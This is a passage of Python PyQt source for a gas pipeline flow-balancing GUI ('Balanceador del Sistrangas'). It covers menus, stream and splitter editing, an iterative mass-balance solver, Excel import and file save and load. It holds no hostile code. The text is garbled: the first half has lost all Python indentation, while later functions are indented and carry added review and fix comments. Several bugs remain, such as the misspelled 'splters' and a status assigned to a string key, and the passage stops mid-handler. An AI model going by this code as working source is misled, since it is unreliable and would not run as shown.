self.CenagasLogo.setPixmap(pixmap_resized)
#Icons para tool bars
#New Document Icon
self.fileNewAction=QAction(QIcon(":/add-new-document.png"),"&New",self)
self.fileNewAction.setShortcut(QKeySequence.New)
helpText="Create a new document"
self.fileNewAction.setToolTip(helpText)
self.fileNewAction.setStatusTip(helpText)
self.fileNewAction.triggered.connect(self.new_file)
#Settings Icon
self.settingsAction=QAction(QIcon(""),"Settings",self)
self.settingsAction.setToolTip("Modificar parámetros de cálculo")
self.settingsAction.triggered.connect(self.modify_settings)
#Text Icon
self.addTextAction=QAction(QIcon(""),"Agregar cuadro de texto",self)
self.addTextAction.setToolTip("Agregar cuadro de texto a la escena")
self.addTextAction.triggered.connect(self.addText)
#Run calculation Icon
self.runCalculation=QAction(QIcon(":/run.png"),"&Run",self)
self.runCalculation.setShortcut("F5")
self.runCalculation.setToolTip("Run calculation. (F5)")
self.runCalculation.setStatusTip("Run calculation")
self.runCalculation.triggered.connect(self.run_all)
#Save Icon
self.save_action=QAction(QIcon(":/add-new-document.png"),"&Save",self)
self.save_action.setShortcut(QKeySequence.Save)
helpText="Save document"
self.save_action.setToolTip(helpText)
self.save_action.setStatusTip(helpText)
self.save_action.triggered.connect(self.save)
#Save as Icon
self.save_as_action=QAction(QIcon(":/add-new-document.png"),"Save as",self)
helpText="Save document as"
self.save_as_action.setToolTip(helpText)
self.save_as_action.setStatusTip(helpText)
self.save_as_action.triggered.connect(self.save_as)
#Open Icon
self.open_action=QAction(QIcon(":/add-new-document.png"),"&Open",self)
self.open_action.setShortcut(QKeySequence.Open)
helpText="Open document"
self.open_action.setToolTip(helpText)
self.open_action.setToolTip(helpText)
self.open_action.triggered.connect(self.Open)
#Import data from Excel Icon
self.import_from_excel=QAction(QIcon(":/excel.png"),"Import from excel",self)
self.import_from_excel.setShortcut("Ctrl+L")
self.import_from_excel.setToolTip("Importar datos de excel")
self.import_from_excel.triggered.connect(self.importf)
#Reset Streams
self.reset_streams=QAction(QIcon(":/reset.png"),"Reset Streams",self)
self.reset_streams.setShortcut("Ctrl+R")
self.reset_streams.setToolTip("Reset Streams")
self.reset_streams.triggered.connect(self.resetf)
'''--------------------------'''
'''Docked widgets'''
#Graphics window
self.view=GraphicsView(self)
self.scene=QGraphicsScene(self)
self.scene.setSceneRect(0,0,PageSize[0],PageSize[1])
self.view.setScene(self.scene)
self.view.setAlignment(Qt.AlignCenter)
self.view.setContextMenuPolicy(Qt.ActionsContextMenu)
self.view.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
self.view.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
self.view.setTransformationAnchor(QGraphicsView.AnchorUnderMouse)
self.marco()
# Paleta de botones
self.Widget=QWidget(self)
self.Widget.setLayout(QVBoxLayout())
self.GridWidgetProceso=QGridLayout()
self.GridWidgetProceso.addWidget(self.CenagasLogo,0,0,0,4)
self.GridWidgetProceso.addWidget(self.AddStream,1,0)
self.GridWidgetProceso.addWidget(self.AddExtraccion,1,1)
self.GridWidgetProceso.addWidget(self.AddDivisor,1,2)
self.GridWidgetProceso.addWidget(self.RotateIcon,1,3)
self.Widget.layout().addLayout(self.GridWidgetProceso)
#Ventana de eventos
self.logDockWidget=QDockWidget("Log",self)
self.logDockWidget.setObjectName("LogDockWidget")
self.listWidget=QTextBrowser()
self.logDockWidget.setWidget(self.listWidget)
#Status Bar
self.sizeLabel=QLabel()
self.sizeLabel.setFrameStyle(QFrame.Sunken)
status=self.statusBar()
status.setSizeGripEnabled(True)
status.addPermanentWidget(self.sizeLabel)
status.showMessage("Ready",10000)
'''---------------'''
'''Menus'''
fileMenu=self.menuBar().addMenu("File")
fileMenu.addAction(self.fileNewAction)
fileToolbar=self.addToolBar("File")
fileToolbar.setObjectName("FileToolBar")
fileToolbar.addAction(self.fileNewAction)
#Tools menu
toolsMenu=self.menuBar().addMenu("Herramientas")
toolsMenu.addAction(self.settingsAction)
toolsMenu.addAction(self.addTextAction)
#Run calculation icon and bar
processToolbar=self.addToolBar("Process")
processToolbar.setObjectName("ProcessToolBar")
processToolbar.addAction(self.runCalculation)
#Import from excel icon bar
processToolbar.addAction(self.import_from_excel)
#Reset Streams icon bar
processToolbar.addAction(self.reset_streams)
#Save
fileMenu.addAction(self.save_action)
fileMenu.addAction(self.save_as_action)
#Open
fileMenu.addAction(self.open_action)
#Open new file
fileMenu.addAction(self.fileNewAction)
'''----------------------------'''
'''Spliters'''
self.ProcesoSplitter=QSplitter(Qt.Vertical)
self.ProcesoSplitter.addWidget(self.Widget)
self.ProcesoSplitter.addWidget(self.logDockWidget)
self.mainSplitter=QSplitter(Qt.Horizontal)
self.mainSplitter.addWidget(self.view)
self.mainSplitter.addWidget(self.ProcesoSplitter)
self.setCentralWidget(self.mainSplitter)
'''_______________---------__________________'''
'''---------------Funciones------------------'''
'''_______________---------__________________'''
def addText(self):
dialog=TextItemDlg(position=self.position(),scene=self.scene,parent=self)
dialog.exec_()
def resetf(self):
for stream in streams:
if streams[stream].editable()!=True:
streams[stream].Flujo="x"
streams[stream].edit=True
for item in self.scene.items():
name=self.get_itemName(item)
if name in streams:
item.setToolTip("Nombre: "+name+"\n Flujo: "+str(streams[name].Flujo))
self.updateLog("Streams reset")
def marco(self):
rect=QRectF(0,0,PageSize[0],PageSize[1])
self.scene.addRect(rect,Qt.black)
margin=0.01
for i in range(0,100):
self.scene.addRect(rect.adjusted(margin,margin,-margin,-margin))
margin+=0.01
def rotate(self):
for item in self.scene.selectedItems():
if item.rotation()==360:
item.setRotation(0)
angle=30+item.rotation()
item.setRotation(angle)
def position(self):
point=self.mapFromGlobal(QCursor.pos())
if not self.view.geometry().contains(point):
coord=random.randint(0,144)
point=QPoint(coord,coord)
else:
if point==self.prevPoint:
point+=QPoint(self.addOffset,self.addOffset)
self.addOffset+=50
else:
self.prevPoint=point
return self.view.mapToScene(point)
def modify_settings(self):
dialog=settingsWindow(self)
if dialog.exec_():
self.tol=float(dialog.Tolerancia.text())
self.max_it=int(dialog.Iteraciones.text())
self.updateLog("Parámetros de cálculo modificados")
self.updateLog("Máximo número de iteraciones: "+str(self.max_it)+" Tolerancia: "+str(self.tol))
def addStreamFun(self):
dialog=StreamWindow(self)
if dialog.exec_():
item=graphic_object()
pixmap=QPixmap(":/Stream.png")
group_test=QGraphicsItemGroup()
item.setPixmap(pixmap.scaled(200,100))
item.setPos(self.position())
a=self.addItemF(item,dialog,"Corriente")
#Add to scene
self.scene.clearSelection()
test_name=self.get_itemName(item)
self.scene.addItem(item)
item.setSelected(True)
def addExtractionFun(self):
''' Validador del dialogo "extraccion" '''
dialog=ExtractionWindow(self)
if dialog.exec_():
item=graphic_object()
pixmap=QPixmap(":/Extraccion.png")
item.setPixmap(pixmap.scaled(200,100))
item.setPos(self.position())
self.scene.clearSelection()
self.addItemF(item,dialog,"Extraccion") #Para añadir info y corriente a lista global de corrientes. Funcion definida por mi
test_name=self.get_itemName(item)
if test_name==dialog.Nombre.text():
self.scene.addItem(item)
item.setSelected(True)
else:
if test_name!="":
del streams[dialog.Nombre.text()]
dialog.Nombre.setText(test_name)
self.addItemF(item,dialog,"Extraccion")
try:
test_name=self.get_itemName(item)
streams[test_name]
self.scene.addItem(item)
item.setSelected(True)
except:
self.updateLog("<font color=red>Error al crear extracción, favor de crearla de nuevo</font>")
del streams[dialog.Nombre.text()]
else:
self.updateLog("<font color=red>Error al crear extracción, favor de crearla de nuevo</font>")
del streams[dialog.Nombre.text()]
def addDivisorFun(self):
dialog=DivisorWindow(self)
if dialog.exec_():
item=graphic_object()
pixmap=QPixmap(":/Divisor.png")
item.setPixmap(pixmap.scaled(200,100))
item.setPos(self.position())
self.scene.clearSelection()
a=self.addItemF(item,dialog,"Divisor")
test_name=self.get_itemName(item)
if test_name==dialog.Nombre.text():
self.scene.addItem(item)
item.setSelected(True)
else:
if test_name!="":
del spliters[dialog.Nombre.text()]
dialog.Nombre.setText(test_name)
self.addItemF(item,dialog,"Divisor")
try:
test_name=self.get_itemName(item)
spliters[test_name]
self.scene.addItem(item)
item.setSelected(True)
except:
self.updateLog("<font color=red>Error al crear divisor, favor de crearla de nuevo</font>")
del spliters[dialog.Nombre.text()]
else:
self.updateLog("<font color=red>Error al crear divisor, favor de crearla de nuevo</font>")
del splters[dialog.Nombre.text()]
def updateLog(self,message):
self.statusBar().showMessage(message,5000)
self.listWidget.append(message)
    def addItemF(self,item,dialog,tipo):
        """Register the entity described by *dialog* in the global tables and
        stamp *item*'s tooltip.

        ``tipo`` is "Corriente", "Extraccion" or "Divisor".  Returns "ok"
        when the entity ended up registered, "error" otherwise.
        """
        if tipo=="Extraccion" or tipo=="Corriente":
            stream=Stream(dialog.Nombre.text())
            flujo=dialog.Flujo.text()
            if flujo=="":
                flujo="x"  # "x" marks an unknown flow
            else:
                flujo=float(flujo)
            if tipo=="Corriente":
                # Only streams (not extractions) carry variable/restriction limits.
                if dialog.critic_checkable.checkState()!=0 or dialog.restriccion_checkable.checkState()!=0:
                    minimo=float(dialog.minimo.text())
                    maximo=float(dialog.maximo.text())
                    limits=(minimo,maximo)
                    stream.limits=limits
                    if dialog.critic_checkable.checkState()!=0:
                        stream.critic="variable"
                        variables.append(stream.name)
                    else:
                        stream.critic="restriccion"
                        restricciones.append(stream.name)
                elif dialog.fijar_checkable.checkState()!=0:
                    stream.fixed=True
            # NOTE(review): Flujo/Tipo are invoked as callables here but read
            # as plain attributes two lines below — presumably setter-style
            # members of the project Stream class; confirm against its
            # definition.
            stream.Flujo(flujo)
            stream.Tipo(tipo)
            global streams
            streams[stream.name]=stream
            if stream.name in streams:
                item.setToolTip("Nombre: "+stream.name+"\n Flujo: "+str(stream.Flujo))
                self.updateLog(str(stream.Tipo)+" añadida con el nombre: "+str(stream.name))
                return "ok"
            else:
                return "error"
        elif tipo=="Divisor":
            spliter=Spliter(dialog.Nombre.text())
            # NOTE(review): entradas/salidas/status called as setters here but
            # read as list attributes elsewhere — same pattern as Stream above.
            spliter.entradas(dialog.Entradas)
            spliter.salidas(dialog.Salidas)
            global spliters
            spliters[spliter.name]=spliter
            spliters[spliter.name].status("Unsolved")
            if spliter.name in spliters:
                item.setToolTip("Nombre: "+''+str(dialog.Nombre.text()))
                self.updateLog(str(tipo)+" añadido con el nombre: "+str(spliter.name))
                return "ok"
            else:
                return "error"
def get_itemName(self,item):
tool_tip=item.toolTip()
tool_tip_lis=tool_tip.split()
i=1
name=""
if "Flujo:" in tool_tip_lis:
while tool_tip_lis[i]!="Flujo:":
name+=tool_tip_lis[i]
if tool_tip_lis[i+1]!="Flujo:":
name+=" "
i+=1
elif "Nombre:" in tool_tip_lis and not "Flujo:" in tool_tip_lis:
for i in range(0,len(tool_tip_lis)):
if i!=0:
name+=tool_tip_lis[i]
if i!=len(tool_tip_lis)-1 and i!=0:
name+=" "
return name
def solve_unique(self,spliter,tol):
ans=node(streams,spliters[spliter],tol)
if ans[0]==0 or ans[0]==1:
corrientes=[]
for i in spliters[spliter].entradas:
corrientes.append(i)
for i in spliters[spliter].salidas:
corrientes.append(i)
for item in self.scene.items():
name=self.get_itemName(item) #Obtiene el nombre de la corriente en item
for corriente in corrientes:
name_2=name.replace(" ","")
corriente_2=corriente.replace(" ","")
if name_2==corriente_2:
item.setToolTip("Nombre: "+corriente+"\n Flujo: "+str(streams[corriente].Flujo))
def delete_item(self):
for item in self.scene.selectedItems():
self.scene.removeItem(item)
name=self.get_itemName(item)
if name in streams:
del streams[name]
self.updateLog("Stream: "+str(name)+" deleted")
for spliter in spliters:
if name in spliters[spliter].entradas:
for entrada in spliters[spliter].entradas:
if name==entrada:
spliters[spliter].entradas.remove(name)
if name in spliters[spliter].salidas:
for salida in spliters[spliter].salidas:
if name==salida:
spliters[spliter].salidas.remove(name)
if name in spliters:
del spliters[name]
self.updateLog("Spliter: "+str(name)+" deleted")
def modify_item(self):
    """Edit the selected stream or spliter through its dialog: rename it,
    update flow/limits/criticality, and propagate renames into spliters.
    """
    # Fix: 'global spliters' was originally declared mid-function, after the
    # name had already been read, which is a SyntaxError on Python 3;
    # declare all globals up front.
    global flag
    global streams
    global spliters
    item = self.scene.selectedItems()
    if len(item) > 1:
        QMessageBox.warning(self, "Error", "Seleccione solo un elemento por favor.")
    else:
        item = item[0]
        name = str(self.get_itemName(item))
        if name in streams:
            tipo = streams[name].Tipo
            flag = True
            if tipo == "Corriente":
                dialog = StreamWindow(self)
            elif tipo == "Extraccion":
                dialog = ExtractionWindow(self)
            if dialog.exec_():
                # Snapshot the previous state so the log can report what changed.
                name_before = streams[name].name
                flujo_before = streams[name].Flujo
                critic_before = streams[name].is_critic()
                fixed_before = streams[name].is_fixed()
                limits_before = streams[name].get_limits()
                if dialog.Nombre.text() == name:
                    # Si lo que cambio fue el flujo: "x" marks an unknown flow.
                    flujo = dialog.Flujo.text()
                    if flujo == "" or flujo == "x":
                        flujo = "x"
                    else:
                        flujo = float(flujo)
                    streams[name].Flujo = flujo
                    stream = streams[name]
                    item.setToolTip("Nombre: " + stream.name + "\n Flujo: " + str(stream.Flujo))
                else:
                    # Si lo que cambio fue el nombre: rebuild the Stream under
                    # the new key, preserving its editability flag.
                    item.setToolTip("Nombre: " + dialog.Nombre.text() + "\n Flujo: " + str(dialog.Flujo.text()))
                    stream = Stream(dialog.Nombre.text())
                    flujo = dialog.Flujo.text()
                    if flujo == "" or flujo == "x":
                        flujo = "x"
                    else:
                        flujo = float(flujo)
                    # Fix: the attributes were invoked as calls
                    # (stream.Flujo(flujo)), which raises TypeError for plain
                    # attributes; assign instead, matching every other site
                    # in this file (e.g. Open()).
                    stream.Flujo = flujo
                    stream.Tipo = tipo
                    editable = streams[name].editable()
                    del streams[name]
                    streams[stream.name] = stream
                    name = stream.name
                    streams[name].edit = editable
                    for spliter in spliters:
                        # Modificar nombre en los divisores asociados.
                        if name_before in spliters[spliter].entradas:
                            for entrada in spliters[spliter].entradas:
                                if name_before == entrada:
                                    spliters[spliter].entradas.remove(name_before)
                                    spliters[spliter].entradas.append(name)
                        elif name_before in spliters[spliter].salidas:
                            for salida in spliters[spliter].salidas:
                                if name_before == salida:
                                    spliters[spliter].salidas.remove(name_before)
                                    spliters[spliter].salidas.append(name)
                if dialog.critic_checkable.checkState() == 0 and dialog.restriccion_checkable.checkState() == 0:
                    # Opcion cuando la casilla marcada es "fixed".
                    if dialog.fijar_checkable.checkState() != 0:
                        state = "no variable ni restricción"
                        minimo = "None"
                        maximo = "None"
                        limits = (minimo, maximo)
                        streams[name].limits = limits
                        streams[name].critic = False
                        streams[name].fixed = True
                        # A fixed stream can no longer be an optimization variable.
                        for i in range(0, len(variables)):
                            if variables[i] == name:
                                del variables[i]
                                break
                else:
                    # Opcion cuando variable o restriccion esta marcada.
                    if dialog.critic_checkable.checkState() != 0 or dialog.restriccion_checkable.checkState() != 0:
                        minimo = float(dialog.minimo.text())
                        maximo = float(dialog.maximo.text())
                        limits = (minimo, maximo)
                        streams[name].limits = limits
                        if dialog.critic_checkable.checkState() != 0:
                            streams[name].critic = "variable"
                            variables.append(streams[name].name)
                        elif dialog.restriccion_checkable.checkState() != 0:
                            streams[name].critic = "restriccion"
                            restricciones.append(streams[name].name)
                # Log every observable change.
                if name_before != streams[name].name or flujo_before != streams[name].Flujo:
                    if tipo == "Corriente":
                        if name_before != streams[name].name:
                            self.updateLog("Corriente " + name_before + ", modificada a " + streams[name].name)
                        if flujo_before != streams[name].Flujo:
                            self.updateLog("Flujo de la corriente " + streams[name].name + ", modificado a " + str(streams[name].Flujo))
                        if critic_before != streams[name].is_critic():
                            if streams[name].is_critic() == False:
                                self.updateLog("Corriente " + streams[name].name + ", modificada a " + "fija")
                            else:
                                self.updateLog("Corriente " + streams[name].name + ", modificada a " + str(streams[name].is_critic()))
                        if limits_before != streams[name].get_limits():
                            self.updateLog("Los limites de la corriente " + streams[name].name + " han sido modificados")
                    elif tipo == "Extraccion":
                        if name_before != streams[name].name:
                            self.updateLog("Extracción " + name_before + ", modificada a " + streams[name].name)
                        if flujo_before != streams[name].Flujo:
                            self.updateLog("Flujo de la extracción " + streams[name].name + ", modificado a " + str(streams[name].Flujo))
                else:
                    if critic_before != streams[name].is_critic():
                        if streams[name].is_critic() == False:
                            self.updateLog("Corriente " + streams[name].name + ", modificada a " + "fija")
                        else:
                            self.updateLog("Corriente " + streams[name].name + ", modificada a " + str(streams[name].is_critic()))
                    if limits_before != streams[name].get_limits():
                        self.updateLog("Los limites de la corriente " + streams[name].name + " han sido modificados")
                flag = False
        elif name in spliters:
            flag = True
            dialog = DivisorWindow(self)
            if dialog.exec_():
                if name == dialog.Nombre.text():
                    # Same name: only the inlet/outlet lists changed.
                    del spliters[name].entradas
                    del spliters[name].salidas
                    spliters[name].entradas = dialog.Entradas
                    spliters[name].salidas = dialog.Salidas
                    #self.solve_unique(name)
                else:
                    # Si lo que cambio fue el nombre: rebuild under the new key.
                    item.setToolTip("Nombre: " + '' + str(dialog.Nombre.text()))
                    test_name = self.get_itemName(item)
                    if test_name != dialog.Nombre.text():
                        if test_name != "":
                            dialog.Nombre.setText(test_name)
                        else:
                            self.updateLog("<b><Font=red>Error al modificar divisor</font></b>")
                    spliter = Spliter(dialog.Nombre.text())
                    # Fix: assign the lists instead of calling the attributes
                    # (the original did spliter.entradas(dialog.Entradas)).
                    spliter.entradas = dialog.Entradas
                    spliter.salidas = dialog.Salidas
                    del spliters[name]
                    spliters[dialog.Nombre.text()] = spliter
                    self.updateLog("Divisor: " + str(spliter.name) + " modificado")
            flag = False
def run_all(self):
    """Iteratively solve every spliter's mass balance until all are
    'Solved', an 'Error' appears, or self.max_it iterations elapse.

    Uses the global `streams`/`spliters` registries.  ``j`` is the
    iteration counter (forced past max_it to abort); ``k`` suppresses
    repeated log messages after the first verification pass.
    """
    global streams
    self.updateLog("Resolviendo.....")
    k=0
    j=0
    # Reset non-editable, non-critical flows to the unknown marker "x".
    for i in streams:
        if streams[i].editable()==False:
            if streams[i].is_critic()==False:
                streams[i].Flujo="x"
    for i in spliters:
        spliters[i].status="Unsolved"
    while(j<self.max_it):
        status_lis=[]
        if k==0:
            self.updateLog("<b> Itración número: </b>"+str(j+1))
        for spliter in spliters:
            if spliters[spliter].status!="Solved" and spliters[spliter].status!="Error":
                self.solve_unique(spliter,self.tol)
            elif spliters[spliter].status=="Error":
                # Abort the outer loop by exhausting the counter.
                j=self.max_it
                if k==0:
                    self.updateLog("<font color=red><b>Se detuvo la iteración debido a que se encontro un error</b></font>")
                    self.updateLog("Divisor en el que se encunetra el error: "+str(spliter))
        for spliter in spliters:
            status_lis.append(spliters[spliter].status)
        if "Unsolved" in status_lis:
            j+=1
            if j==self.max_it-1:
                # Gave up: report which spliters are still unsolved.
                self.updateLog("<font color=red><b>Se realizarón "+str(self.max_it)+" iteraciones sin encontrar un resultado</b></font>")
                self.updateLog("Estatus de los divisores:")
                for spliter in spliters:
                    if spliters[spliter].status!="Solved":
                        self.updateLog("Divisor: "+str(spliter)+" "+spliters[spliter].status)
                j=self.max_it+10
        else:
            if k==0:
                self.updateLog("<b>Comprobando resultados de la iteración...</b>")
            k+=1
            j+=1
            # Verify every spliter's inlet/outlet balance within tolerance.
            for spliter in spliters:
                inlets=[]
                outlets=[]
                for i in spliters[spliter].entradas:
                    inlets.append(streams[i].Flujo)
                for i in spliters[spliter].salidas:
                    outlets.append(streams[i].Flujo)
                ans_entradas=0
                ans_salidas=0
                for i in inlets:
                    ans_entradas+=i
                for i in outlets:
                    ans_salidas+=i
                ans=ans_entradas-ans_salidas
                if ans>self.tol:
                    # NOTE(review): `spliter` is a dict key (a string) here, so
                    # this assignment creates an attribute on a str and likely
                    # should be spliters[spliter].status — confirm before fixing.
                    spliter.status="Error"
                    j=self.max_it
                    self.updateLog("<font color=red><b>Se encontro un error en el divisor: "+str(spliter)+"</b></font>")
                    j=self.max_it+1
            else:
                # for/else: this branch always runs because the loop never
                # breaks, declaring success and ending the while loop.
                self.updateLog("<b><font color=green>Se ha terminado la iteración de manera satisfactoria</font></b>")
                j=self.max_it
def importf(self):
    """Import flow values from an Excel workbook (via xlwings) into the
    global `streams` registry.

    Scans two table areas of the second sheet (rows starting at 11 and at
    29), walking the column groups A/E/I/M/Q down to the "TOTAL" sentinel
    row; the flow value sits one column to the right of each stream name.
    """
    # Start the file dialog in the folder of the current file, if any.
    if self.filename=="":
        path="."
    else:
        path=self.filename.split("/")
        path=path[0:-1]
        path="/".join(path)
    fname=QFileDialog.getOpenFileName(self,"Balanceador - Open excel file",path,"Oferta y demanda(*.xlsx)")
    if fname[0]=="":
        return
    fname_log=fname[0].split("/")
    fname_log=fname_log[-1]
    self.updateLog("Importing data from: "+fname_log+".....")
    wb=xw.Book(fname[0])
    sheet=wb.sheets[1]
    #Ciclo para inyecciones
    try:
        filas=["A","E","I","M","Q"]
        for fila in filas:
            i=11
            b=sheet.range(fila+str(i)).value
            while(b!="TOTAL"):
                excel_stream=sheet.range(fila+str(i)).value
                # Column groups I and M carry a prefix in the registry names.
                if fila=="I":
                    excel_stream="Campo "+excel_stream
                if fila=="M":
                    excel_stream="LNG "+excel_stream
                if excel_stream in streams:
                    if fila=="A":
                        streams[excel_stream].Flujo=sheet.range("B"+str(i)).value
                    if fila=="E":
                        streams[excel_stream].Flujo=sheet.range("F"+str(i)).value
                    if fila=="I":
                        streams[excel_stream].Flujo=sheet.range("J"+str(i)).value
                    if fila=="M":
                        streams[excel_stream].Flujo=sheet.range("N"+str(i)).value
                    if fila=="Q":
                        streams[excel_stream].Flujo=sheet.range("R"+str(i)).value
                i+=1
                b=sheet.range(fila+str(i)).value
        # Second table area (demand section), starting at row 29.
        for fila in filas:
            i=29
            b= b=sheet.range(fila+str(i)).value
            while(b!="TOTAL"):
                excel_stream=sheet.range(fila+str(i)).value
                if excel_stream in streams:
                    if fila=="A":
                        streams[excel_stream].Flujo=sheet.range("B"+str(i)).value
                    if fila=="E":
                        streams[excel_stream].Flujo=sheet.range("F"+str(i)).value
                    if fila=="I":
                        excel_stream=excel_stream
                        streams[excel_stream].Flujo=sheet.range("J"+str(i)).value
                    if fila=="M":
                        streams[excel_stream].Flujo=sheet.range("N"+str(i)).value
                    if fila=="Q":
                        streams[excel_stream].Flujo=sheet.range("R"+str(i)).value
                i+=1
                b=sheet.range(fila+str(i)).value
    except KeyError:
        # Best-effort import: unknown names are silently skipped.
        pass
    # Refresh the tooltips of all graphic items with the imported flows.
    for item in self.scene.items():
        if isinstance(item,QGraphicsPixmapItem):
            self.update_toolTip(item)
    self.updateLog("Data imported")
def update_toolTip(self, item):
    """Refresh *item*'s tooltip from the global stream registry."""
    key = self.get_itemName(item)
    if key in streams:
        stream = streams[key]
        item.setToolTip("Nombre: " + key + "\n Flujo: " + str(stream.Flujo))
'''---------------------------------------------------------------------------------------------------'''
'''-----------------Funciones de abrir y guardar-----------------------------------------------------'''
def save(self):
    """Save to the current file, prompting for a filename first when none
    has been chosen yet (otherwise delegates straight to save_f)."""
    if self.filename=="":
        path="."
        fname=QFileDialog.getSaveFileName(self,"Balanceador - Save as",path,"Balanceador Files(*.pgd)")
        if fname[0]=="":
            # User cancelled the dialog: abort without saving.
            return
        self.filename=fname[0]
    self.save_f()
def save_f(self):
    """Serialize the diagram (spliter/stream registries plus graphics and
    text items) to ``self.filename`` with a QDataStream.

    Layout written: counts, sorted keys, spliter statuses, spliter
    inlet/outlet lists + positions, stream records + positions, graphics
    item count, pixmap items, then text items.
    """
    fh = None
    try:
        fh = QFile(self.filename)
        if not fh.open(QIODevice.WriteOnly):
            raise IOError  # str(fh.errorString())
        name = self.filename.split("/")[-1]
        self.updateLog("Saving file.... " + str(name))
        self.setWindowTitle("Balanceador del Sistrangas----" + name)
        self.scene.clearSelection()
        qstream = QDataStream(fh)
        qstream.setVersion(QDataStream.Qt_4_2)
        qstream.writeInt(len(spliters))
        qstream.writeInt(len(streams))
        # Keys are written sorted so Open() can rebuild both dicts in a
        # deterministic order.
        for i in sorted(spliters.keys()):
            qstream.writeQString(str(i))
        for i in sorted(streams.keys()):
            qstream.writeQString(str(i))
        # Spliter status strings.
        for i in sorted(spliters.keys()):
            qstream.writeQString(str(spliters[i].status))
        # Spliter inlet/outlet stream names plus scene position.
        for i in sorted(spliters.keys()):
            qstream.writeInt(len(spliters[i].entradas))
            for j in spliters[i].entradas:
                qstream.writeQString(str(j))
            qstream.writeInt(len(spliters[i].salidas))
            for j in spliters[i].salidas:
                qstream.writeQString(str(j))
            for item in self.scene.items():
                name = self.get_itemName(item)
                if str(name) == str(spliters[i].name):
                    spliters[i].Pos = item.pos()
            qstream << spliters[i].Pos
        # Stream records: name, editability, flow, type, position.
        for i in sorted(streams.keys()):
            qstream.writeQString(str(streams[i].name))
            qstream.writeQString(str(streams[i].editable()))
            qstream.writeQString(str(streams[i].Flujo))
            qstream.writeQString(str(streams[i].Tipo))
            for item in self.scene.items():
                name = self.get_itemName(item)
                if str(name) == str(streams[i].name):
                    streams[i].Pos = item.pos()
            qstream << streams[i].Pos
        # Graphics items: write the pixmap-item count, then each item.
        len_graphics = 0
        for item in self.scene.items():
            if isinstance(item, QGraphicsPixmapItem):
                len_graphics += 1
        qstream.writeQString(str(len_graphics))
        for item in self.scene.items():
            self.writeItemToStream_graphics(qstream, item)
        for item in self.scene.items():
            self.writeItemToStream_Text(qstream, item)
        self.updateLog("Saved")
    except IOError:
        # Fix: the original format string had two placeholders ("%s: %s")
        # but only one argument, raising TypeError inside the handler.
        QMessageBox.warning(self, "Balanceador --- Save Error",
                            "Failed to save %s" % (self.filename))
    finally:
        if fh is not None:
            fh.close()
def writeItemToStream_Text(self, qstream, item):
    """Serialize one text annotation: its string, position, and font."""
    if not isinstance(item, QGraphicsTextItem):
        return
    qstream.writeQString(item.toPlainText())
    qstream << item.pos() << item.font()
def writeItemToStream_graphics(self, qstream, item):
    """Serialize one pixmap item: registry type, rotation, position, pixmap.

    Items that are neither spliters nor streams are tagged "Pass" (with no
    payload), which readItemFromStream() skips; previously `tipo` stayed
    unbound for them and raised NameError.
    """
    if isinstance(item, QGraphicsPixmapItem):
        name = self.get_itemName(item)
        if name in spliters:
            tipo = "Divisor"
        elif name in streams:
            tipo = streams[name].Tipo
        else:
            # Unknown item: write only the sentinel tag the reader skips.
            qstream.writeQString("Pass")
            return
        qstream.writeQString(tipo)
        # Fix: rotation() returns a float but writeInt() needs an int.
        qstream.writeInt(int(item.rotation()))
        qstream << item.pos() << item.pixmap()
def Open(self):
    """Load a .pgd diagram: rebuild the global registries, recreate the
    scene items, and restore tooltips and per-stream flags.

    Must read the stream in exactly the order save_f() wrote it.
    """
    path=QFileInfo(self.filename).path() \
        if not self.filename=="" else "."
    fname=QFileDialog.getOpenFileName(self,"Balanceador - Open",path,"Balanceador Files(*.pgd)")
    if fname[0]=="":
        return
    self.filename=fname[0]
    name=self.filename
    name=name.split("/")
    name=name[-1]
    self.updateLog("Loading file.... "+str(name))
    self.setWindowTitle("Balanceador del Sistranags-----"+str(name))
    fh=None
    global spliters
    global streams
    global critic
    spliters={}
    streams={}
    try:
        fh=QFile(self.filename)
        if not fh.open(QIODevice.ReadOnly):
            raise IOError
        # Clear the scene before loading the new diagram.
        items=self.scene.items()
        while items:
            item=items.pop()
            self.scene.removeItem(item)
            del item
        qstream=QDataStream(fh)
        qstream.setVersion(QDataStream.Qt_4_2)
        len_spliters=0
        len_streams=0
        key=""
        len_spliters=qstream.readInt()
        len_streams=qstream.readInt()
        keys_spliters=[]
        keys_streams=[]
        for i in range(0,len_spliters):
            key=qstream.readQString()
            keys_spliters.append(key)
        for i in range(0,len_streams):
            key=qstream.readQString()
            keys_streams.append(key)
        #Parentesis, creación de corrientes y spliters en global dictionaries
        for spliter in keys_spliters:
            spliter_i=Spliter(spliter)
            spliters[spliter]=spliter_i
        for stream in keys_streams:
            stream_i=Stream(stream)
            streams[stream]=stream_i
        #Continua carga de datos from qstream
        for i in keys_spliters:
            status=qstream.readQString()
            spliters[i].status=status
        for i in keys_spliters:
            len_entradas=qstream.readInt()
            spliters[i].entradas=[]
            spliters[i].salidas=[]
            for j in range(0,len_entradas):
                entrada=qstream.readQString()
                spliters[i].entradas.append(entrada)
            len_salidas=qstream.readInt()
            for j in range(0,len_salidas):
                salida=qstream.readQString()
                spliters[i].salidas.append(salida)
            position=QPointF()
            qstream >> position
            spliters[i].Pos=position
        for i in keys_streams:
            streams[i].name=qstream.readQString()
            streams[i].edit=qstream.readQString()
            streams[i].Flujo=qstream.readQString()
            # Flows are serialized as strings; numeric ones convert back,
            # the unknown marker "x" stays a string.
            try:
                streams[i].Flujo=float(streams[i].Flujo)
            except:
                streams[i].Flujo=str(streams[i].Flujo)
            streams[i].Tipo=qstream.readQString()
            position=QPointF()
            qstream >> position
            streams[i].Pos=position
        len_items=qstream.readQString()
        len_items=int(len_items)
        for i in range(0,len_items):
            self.readItemFromStream(qstream)
        # Whatever remains in the stream is text annotations.
        while not fh.atEnd():
            self.readTextFromStream(qstream)
        #Seting tooltips: match items to registry entries by scene position.
        for item in self.scene.items():
            scene_pos=item.pos()
            for stream in streams:
                if scene_pos==streams[stream].Pos:
                    item.setToolTip("Nombre: "+streams[stream].name+"\n Flujo: "+str(streams[stream].Flujo))
            for spliter in spliters:
                if scene_pos==spliters[spliter].Pos:
                    item.setToolTip("Nombre: "+''+str(spliters[spliter].name))
        # editable() round-trips as the strings "True"/"False"; convert back.
        for stream in streams:
            if streams[stream].editable()=="True":
                streams[stream].edit=True
            if streams[stream].editable()=="False":
                streams[stream].edit=False
        #Añadiendo corrientes criticas a lista
        for stream in streams:
            if streams[stream].is_critic()==True:
                critic.append(stream)
        self.marco()
    except IOError:
